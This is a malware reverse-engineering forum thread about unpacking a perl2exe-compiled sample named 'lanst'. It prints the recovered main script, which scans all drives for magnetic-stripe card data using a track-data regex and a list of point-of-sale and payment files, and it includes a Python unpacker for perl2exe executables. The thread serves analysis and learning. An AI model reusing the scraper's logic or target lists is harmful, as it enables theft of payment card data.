[Cyb3rHack3r]

Hay, Guys



So i need little help, I am new to malaware reverse engineering but i really love to learn more

Now i am trying to Decompile a malware which is complied using perl2exe

Now like i said i am new i tried my best but no luck because i have never Decompiled a perl2exe file before

So i am not fully sure how i should do it, I tried to search on the net and found some really

Interesting information like its decrypted during runtime

So can any one tell me how i can decompile the file and get the decrypted source code

By the way i tried this tool called exe2perl which is suppose to be decompiler but i got a error saying

"signature not found, exiting" so any help is appreciated.

[r2nwcnydc]

I haven't tried it before, but you can try this

http://www.fileoffset.com/re/tutorials/perl2exe.htm

To get the files without needing to debug the file, you could try using an analysis system that stores dropped files.

[Cyb3rHack3r]

I actully tried to follow that tut before as well but

i got stuck at

Code: Select all

Load this up in IDA.

There is a routine in the p2x.dll which will loop over the decrypted TOC, the TOC contains a list of filenames, sizes and a flag indicating whether it is encrypted or not.

As its enumerating the list (at startup) it will compare the filename to a list of file extensions

As i am new to all this i wasn't able to follow the whole tutorial, And i am trying bunch of diff software hoping one will do what you say, If you know any software which does that please do let me know.

[r2nwcnydc]

http://www.kernelmode.info/forum/viewto ... ?f=16&t=64

The sandboxes on that link will at a minimum show the files that changed. Some of them should give you the files as well; I use a commerical version so we get the files I don't know if the free versions offer the same service.

or:
http://www.kernelmode.info/forum/viewto ... =11&t=1735

If those don't work and you can figure out the temporary directory, you could also try changing the folders permissions so that no one has the right to delete files from that folder. I doubt perl2exe overwrites the files first.

[Cyb3rHack3r]

Thanks for the reply, however i did mange to get the files which are created using a disassembler

But the files are saved in a temp folder which are jest bunch of dlls used by perl2exe so i think it is decrypting the

data in the memory or something, I did dump the memory i do see small parts of the source but fixing it will be really hard

or maybe i am dumping the memory wrong, Any suggestions.

[r2nwcnydc]

I'm not sure then.. If you post the file I can play around with it and give you a better answer. But otherwise, I'm just googling and spinning my wheels.

[Cyb3rHack3r]

Sorry for the delay, No need to post i got the sample from here only

http://www.kernelmode.info/forum/viewto ... pos#p14595

file name is lanst

I actually learned a lot while trying to decomplie this, I still didn't decomplie it but still trying.

[reverser]

Main script.

Code: Select all

#!/usr/bin/perl# Подключаем основные модули
# 24.03.2008
#	- При обнаружении в файле данных соотвествующих строке поиска (regex)
#	  прекращать обработку файла.
#perl2exe_include "Tie/Handle.pm";
#perl2exe_include "Math/BigInt/Calc.pm";
use Win32::Console::ANSI;
use strict;
use warnings;
#use DBI;
use FileHandle;
use Win32API::File::Time qw{:win};
use threads;
use POSIX qw{floor};
require "general.pm";
require "netenum.pm";
no warnings 'threads';
$|=1;

use vars '$dbh', '$url_start', '$dir_start', '@dir_filter', '@file_type_exclude','$version','$regex','$maxlivetime','$debug','@file_name_include','$dietime','$lansttype';
$lansttype = 'Gen';
$version="Version 1.4a MultiThread from 22.04.2008";
#$regex = '((([0-9]{13,19}=)|([a-zA-Z\s]{3}\^))(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))|(CARD_NUMBER|EXPIRATION_DATE|CVV|TRACK2|TRACK1){1})';
$regex = '((([0-9]{13,19}=)|([a-zA-Z\s]{3}\^))(0[7-9]|1[0-5])((0[1-9])|(1[0-2])))';
$maxlivetime = 86400*30*6*2; # последнее обновление файла, примерно пол года
$debug = 'off';
$dietime = 1207392905+(86400*30*2);
if ( time  > $dietime ) { die("Can't open Handle/Tie.PM!"); };
# Фильтр директорий (директории, которые исключаются из индексации)
    @dir_filter = (
                    'images',
		    'INBOX',
		    'inbox',
		    'i386',
		    'I386'
                   );
# Фильтр файлов (какие расширения файлов индексировать)
    @file_type_exclude = (
                   'exe','ex_',				# Executables
                   'dll','dl_',				# Libraries
                   'cab','msi',				# Cabinet/Installs
                   'chm','hlp',				# Help files
                   'mid','midi',                        # Sound files (MID)
                   'rar','zip','tgz','gz',              # Archives 
                   'mp3','wma','wav',			# Sound files (MPEG)
                   'avi','mov','wmv','mpeg',		# Video files
		   'png','jpg','tiff','bmp','gif',	# Pictures
                   'iso',				# ISO Images
                   'swf',				# Flash files
                   'htm','html',			# HTML Pages
                   'asp','aspx',			# ASP Sciprts
                   'vbs','pl','php','cgi',		# Perl, PHP, etc Scritps
		   'c','h',				# C files
		   'psd',				# Presentations
                   'pdf',				# Acrobar Reader files
		   'grd'				# Strong Disk files
                  );
# Всегда пишем в лог эти файлы:
    @file_name_include = (
                   'icverify.lrq',
                   'pbadmain.dat',
                   'netsend.in',
                   'netsend.out',
                   'otreg.dat',
		   'iso8583_5th3rd_interface.log',
                   'FINDATA01.DBF',
                   'QUICKDATA01.DBF',
                   'ccprocess.asp',
                   'ccprocess2.asp',
                   'micros',
                   'cdi.exe',
                   'CDI.exe',
                   'PTCWIN.DB',
                   'FO_DATA',
                   'FO_DATA',
                   'roomMaster'
    );
# Сразу отправляем заголовок браузеру
#    print "Content-type: text/html; charset=windows-1251\n\n";


my $time = time();








if ( !defined($ARGV[0]) || ((defined($ARGV[0])) && ( $ARGV[0] ne '*')) ) {
  if (( @ARGV == 1 ) && ( $ARGV[0] eq "checkme" )) { print "LANST WORKING FINE"; exit; };
  if ( @ARGV == 1 ) { 
    $dir_start=$ARGV[0]; 
    print "Start dir: $dir_start\n";
    &recursion($dir_start);
  } else {
    my @thr;
    my $x=0; 
    open(O,">lanst.lst");
    print O "1";
    close(O);
    print "Creating threads for";
#    for (my $i='C'; $i ne 'AA'; $i++) {
    for (my $i='C'; $i ne 'AA'; $i++) {
      my $param = $i.':/';
      next if !(-d $param);
      $x++;
      print " disk $i ";
      $thr[$x] = threads->create('recursion',"$param");
    };                                                             
    print "Loaded ($x).\nWorking";
    my $exit=0;
    while (threads->list(threads::running)) {
      my $total = threads->list(threads::running);
      sleep(5);
      my $done = floor(($x-$total)/$x*100);
      print ".$total($done"."%".")";
    };
  open(O,">lanst.loc");
  print O "1";
  close(O);
  print "\n";
  };
} else {
  print "Network enumeration...\n";
  open(O,">lanst.nst");
  print O "1";
  close(O);
  &netenum;
  open(O,">lanst.net");
  print O "1";
  close(O);
};
print "Done!\n";
$time = time() - $time;
print "Elapsed: $time seconds\n";
exit;

[reverser]

Python script for unpacking.

Code: Select all

# p2x unpacker (c) 2012 reverser

import array
import sys
import os.path
import os

def make_key(src):
  dst = array.array('B')
  for i in range(256):
    dst.append(i)
  dst.append(0)
  dst.append(0)
  srclen = len(src)
  src = array.array('B', src)
  j = 0
  k = 0
  for i in range(256):
    j = (src[k] + j + dst[i]) & 0xFF
    dst[j], dst[i] = dst[i], dst[j]
    k = (k + 1) % srclen
  return dst

def unscramble_1(src, k):
  srclen = len(src)
  src = array.array('B', src)
  p1 = k[256]
  p2 = k[257]
  for i in range(srclen):
    p1 = (p1 + 1) & 0xFF
    p2 = (p2 + k[p1]) & 0xFF
    k[p2], k[p1] = k[p1], k[p2]
    src[i] ^= k[(k[p1] + k[p2]) & 0xFF]
  k[256] = p1
  k[257] = p2
  return src.tostring()

class Decryptor:
  def __init__(self, tpl, s):
    k1 = make_key(s)
    sc = unscramble_1(tpl, k1)
    self.key = make_key(sc)

  def decrypt(self, s):
    k1 = self.key[:]
    return unscramble_1(s, k1)

g_dec = Decryptor("For more information visit www.indigostar.com", "continue")

# NAME=<name>;SIZE=<size>;ENC=<enc>
def parse_finfo(s):
  props = {}
  i1 = s.find('NAME=')
  i2 = s.find(';SIZE=', i1+5)
  if i1 == -1 or i2 == -1:
    return
  props['name'] = s[i1+5:i2]
  i3 = s.find(';ENC=', i2+6)
  if i3 != -1:
    props['size'] = int(s[i2+6:i3])
    props['enc'] = int(s[i3+5:])
  else:
    i3 = s.find(';VALUE=', i2+6)
    if i3 == -1:
      props['size'] = int(s[i2+6:])
      props['value'] = ''
    else:
      props['size'] = int(s[i2+6:i3])
      props['value'] = s[i3+7:]
    props['enc'] = 0
  return props

def write_file(name, body):
  dir = os.path.dirname(name)
  if dir and not os.path.exists(dir):
    os.makedirs(dir)
  open(name, 'wb').write(body)

if len(sys.argv) < 2:
  print "Usage: p2x_dec.py <file.exe>"
  sys.exit(1)

taillen = 256
fn = sys.argv[1]
inf = open(fn, "rb")
inf.seek(-taillen, 2)
stail = g_dec.decrypt(inf.read(taillen))
tocprops = parse_finfo(stail)
if not tocprops:
  print "Not a perl2exe file?"
  sys.exit(1)

tocsz = tocprops['size']
inf.seek(-taillen - tocsz, 2)
toc = inf.read(tocsz)
toc = g_dec.decrypt(toc)
write_file(tocprops['name'], toc)
inf.seek(0)
for line in toc.split('\n'):
  line = line.rstrip('\n')
  fprops = parse_finfo(line)
  if fprops:
    sz = fprops['size']
    nm = fprops['name']
    if sz:
      fbody = inf.read(sz)
      if fprops['enc']:
        fbody = g_dec.decrypt(fbody)
      print nm
      write_file(nm, fbody)

[jpac]

I need some help reversing a perl2exe file as well -reverser, can you assist with this? thank you!